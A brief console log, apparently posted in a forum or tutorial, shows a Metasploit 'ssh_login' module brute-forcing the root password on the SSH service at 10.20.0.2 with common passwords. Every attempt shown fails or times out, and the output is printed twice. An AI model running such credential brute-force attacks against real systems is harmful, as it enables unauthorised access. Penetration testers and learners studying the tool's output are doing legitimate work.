the result of work:
msf auxiliary(ssh_login) > exploit
[*] 10.20.0.2:22 SSH - Starting bruteforce [-] 10.20.0.2:22 SSH - Failed: 'root:123456' [-] 10.20.0.2:22 SSH - Failed: 'root:12345' [-] 10.20.0.2:22 SSH - Failed: 'root:123456789' [-] 10.20.0.2:22 SSH - Could not connect: The connection timed out (10.20.0.2:22). [-] 10.20.0.2:22 SSH - Could not connect: The connection timed out (10.20.0.2:22). [-] 10.20.0.2:22 SSH - Could not connect: The connection timed out (10.20.0.2:22). [*] Scanned 1 of 1 hosts (100% complete)
the result of work:
msf auxiliary( ssh_login) > exploit
[*] 10.20.0.2:22 SSH - Starting bruteforce
[-] 10.20.0.2:22 SSH - Failed: 'root:123456'
[-] 10.20.0.2:22 SSH - Failed: 'root:12345'
[-] 10.20.0.2:22 SSH - Failed: 'root:123456789'
[-] 10.20.0.2:22 SSH - Could not connect: The connection timed out (10.20.0.2:22).
[-] 10.20.0.2:22 SSH - Could not connect: The connection timed out (10.20.0.2:22).
[-] 10.20.0.2:22 SSH - Could not connect: The connection timed out (10.20.0.2:22).
[*] Scanned 1 of 1 hosts (100% complete)